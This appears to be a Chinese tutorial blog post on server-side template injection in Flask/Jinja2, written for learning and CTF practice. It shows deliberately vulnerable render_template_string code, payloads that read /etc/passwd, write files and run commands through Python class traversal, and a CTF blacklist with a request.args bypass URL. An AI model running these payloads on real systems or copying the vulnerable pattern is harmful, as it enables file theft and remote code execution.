关于flask的SSTI注入[通俗易懂]

2022-09-27 10:57:27 浏览数 (1)

大家好,又见面了,我是你们的朋友全栈君。

ssti注入又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。

它的实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题。

这个问题主要是出在web应用模板渲染的过程中,目前比较流行的渲染引擎模板主要有:smarty,twig,jinja2,freemarker,velocity

而python中的一个微型框架flask主要就是使用的jinja2来作为渲染模板,在目前的ctf中常见的SSTI也主要就是考察的python,因此我记录一下关于python flask的jinja2引发的SSTI,也帮助自己更深入的学习和理解ssti注入攻击这个知识点。

在学习jinja2造成的ssti时,先初步了解一下关于python的flask框架,以及flask是如何通过jinja2来进行模板渲染的。

flask的运行流程:

路由:

想要在浏览器中访问由flask创建的web,需要设置路由,看代码

代码语言:javascript复制
//index.py

from flask import Flask,url_for,redirect,render_template,render_template_string,request
app = Flask(__name__)

@app.route("/index/")
def test():
    return "Hello flask"

if __name__ == "__main__":
    app.run()

@app.route(“/index/”) 中,route装饰器的作用就是将函数和url绑定起来,当运行这个脚本之后,访问

代码语言:javascript复制
http://127.0.0.1:5000/index

就会返回Hello flask,这就是简单的flask框架的运行。

渲染:

flask有两种渲染方式,render_template() 和 render_template_string()。

render_template()是渲染文件的,render_template_string是渲染字符串的,ssti也主要与渲染字符串这种方式有关。

在网站的根目录下创建templates文件夹,主要用来存放html文件,也是渲染用的模板文件。

render_template:

代码语言:javascript复制
//index.py
@app.route("/index/")
def test():
    return render_template("index.html")

//index.html 在 /templates/index.html

render_template_string:

代码语言:javascript复制
//index.py
@app.route("/index/")
def test():
    content = "test by gurenmeng"
    return render_template_string(content)

使用{ { }}变量包裹:

{ { }}在jinja2中为变量包裹标识符

代码语言:javascript复制
//index.py
@app.route("/index/")
def test():
    html = "test by gurenmeng"
    return render_template("index.html", content=html)



//templates/index.html
<p3>{
  
  {content}}</p3>

访问 http://127.0.0.1:5000/index 就会自动加载templates/index.html,将html这个参数内容传递给content这个变量,然后渲染到web页面。页面就会输出 test by gurenmeng。

模板注入:

如果错误的使用render_template_string渲染方式的话,就会产生模板注入。

先测试简单的xss:

代码语言:javascript复制
//index.py
@app.route("/index/")
def test():
    content = request.args.get("content")
    return render_template_string(content)

直接返回渲染的get传输的数据,并且渲染的content内容是用户可控的

直接渲染出现xss漏洞。

换一种写法:

代码语言:javascript复制
//index.py
@app.route("/index/")
def test():
    content = request.args.get("content")
    return render_template_string("{
  
  {html}}", html=content)

访问web

js代码被原样输出,这是因为模板引擎一般都默认对渲染的变量值进行编码转义,这样就不会存在xss了。

在这段代码中用户所控的是code变量,而不是模板内容。

存在漏洞的代码中,模板内容直接受用户控制的。之前弹窗的代码一样。

xss知识模板注入的一个非常小的一个应用,根据危害性的是其他攻击方式:读写文件,命令执行

在Jinja2模板引擎中,{ {}}是变量包裹标识符。{ {}}并不仅仅可以传递变量,还可以执行一些简单的表达式。

利用之前弹窗的代码:

表达式被执行,进行了简单的乘法运算。

实行文件读写和命令执行的基本操作:获取基本类->获取基本类的子类->在子类中找到关于命令执行和文件读写的模块

python的几个函数解析:

代码语言:javascript复制
__class__ 返回调用的参数类型
__bases__ 返回类型列表
__mro__ 此属性是在方法解析期间寻找基类时考虑的类元组
__subclasses__() 返回object的子类
__globals__ 函数会以字典类型返回当前位置的全部全局变量 与 func_globals 等价

获取基本类(object):

代码语言:javascript复制
//获取基本类 object
''.__class__.__mro__[2]
{}.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]
request.__class__.__mro__[9]   //在flask的jinja2模块渲染是可用

获取基本类的子类:

代码语言:javascript复制
object.__subclasses__()
//''.__class__.__mro__[2].__subclasses__()
//...基于上面的其他写法

快速查找该引用对应的位置:

代码语言:javascript复制
''.__class__.__mro__[2].__subclasses__().index(file)

文件读写:

在子类里面有<type ‘file’>这个引用的索引,可以直接调用进行文件读写:

代码语言:javascript复制
''.__class__.__mro__[2].__subclasses__()[40]
代码语言:javascript复制
''.__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read()

将read()改为write()就可以进行写操作:

代码语言:javascript复制
''.__class__.__mro__[2].__subclasses__()[40]("/root/桌面/test.txt", "a").write("123")

或者在基本类的子类中找到重载过的__init__类(对python不是很熟悉,所以这里不太清楚,不过在基本类的子类中的一些类属性基本都有引用),查看引用 __builtins__

代码语言:javascript复制
''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']
代码语言:javascript复制
//读取文件
''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['file']("/etc/passwd").read()

命令执行:

方法一:利用eval进行命令执行

代码语言:javascript复制
''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("whoami").read()')

方法二:利用commands实现命令执行:

代码语言:javascript复制
[].__class__.__base__.__subclasses__()[59].__init__.__globals__['linecache'].__dict__.values()[12].__dict__.values()[144]('whoami')}
代码语言:javascript复制
{}.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('whoami').read()

(在进行jinja2模板注入时,直接将这些payload放入{ {}}中作为变量执行即可获得想要的结果,如果存在对应键不在相应位置,那么就需要我们从基本类开始找了,一般来说应该是一样的,这个需要看python环境)

举例一个ctf:

点击到regist.php是一个404页面,并且动态输出错误url,然后测试xss,会弹窗,这是过滤了字符的,所以应该知道这里是存在ssti的,进一步测试{ {2*3}},错误页面会输出数字6,所以这个题就是考察python flask的ssti的。

但是经过测试,这里是过滤了很多字符的,后面看writeup,贴出他的黑名单:

代码语言:javascript复制
black_list = [ 'write', 'class', 'mro', 'read', '<', '>', '|', 'join' 'os', 'sys', 'pop', 'del', 'rm', 'eval', 'exec', 'ls', 'cat', ';', '&&', 'catch_warnings', 'func_globals', 'pickle', 'import', 'subprocess', 'commands', 'input', 'execfile', 'reload', 'compile', 'execfile', 'kill', 'func_code' ]

这里我们使用request.args这个参数来进行绕过。

request.args是flask中的一个属性,为返回请求的参数,将后面的参数作为变量传递进去,进而绕过一些限制,具体看payload:

代码语言:javascript复制
http://111.198.29.45:31540/{
  
  {''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read

他过滤了class,mro,subclasses,read,所以使用request.args返回后面的参数,将后面的参数作为一个变量传递进来,这样就染过了里面的一些黑名单。

最终可成功读取到文件。

对flask jinja2更深入的利用:

https://www.freebuf.com/articles/web/98928.html

常见绕过方法:

https://bbs.ichunqiu.com/thread-47685-1-1.html?from=aqzx8

参考文章:

https://www.freebuf.com/column/187845.html

https://bbs.ichunqiu.com/thread-47685-1-1.html?from=aqzx8

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/179203.html原文链接:https://javaforall.cn

0 人点赞